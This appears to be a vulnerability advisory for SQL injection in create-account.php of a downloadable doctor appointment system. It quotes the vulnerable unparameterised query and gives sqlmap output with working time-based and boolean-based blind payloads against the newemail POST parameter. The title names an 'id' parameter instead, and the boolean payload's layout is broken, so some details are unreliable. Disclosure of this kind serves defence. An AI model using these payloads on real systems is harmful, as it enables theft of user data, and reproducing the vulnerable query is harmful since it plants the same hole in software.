SQL injection vulnerability exists in id parameter of create-account.php file of edoc doctor appointment system

Important user data or system data may be leaked and system security may be compromised. The environment is secure and the information can be used by malicious users.

```
if ($newpassword==$cpassword) {
      $result= $database->query("select * from webuser where email='$email';");
sqlmap identified the following injection point(s) with a total of 287 HTTP(s) requests:
Type: time-based blind
Title: MySQL ≥ 5.0.12 AND time-based blind (query SLEEP)
Payload: newemail=123@123.com' AND (SELECT 5428 FROM (SELECT(SLEEP(5)))bOLj)-- lHsV&tele=0712345678&newpassword=
123&cpassword=123
Parameter: newemail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
                         newemail=123@123.com'
                                                                                 4258=4258--
                                                                AND
VXWJ&tele=0712345678&newpassword=123&cpassword=123
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newemail=123@123.com' AND (SELECT 5428 FROM (SELECT(SLEEP(5)))bOLj)--
lHsV&tele=0712345678&newpassword=123&cpassword=123
"
```

Source Download:

https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html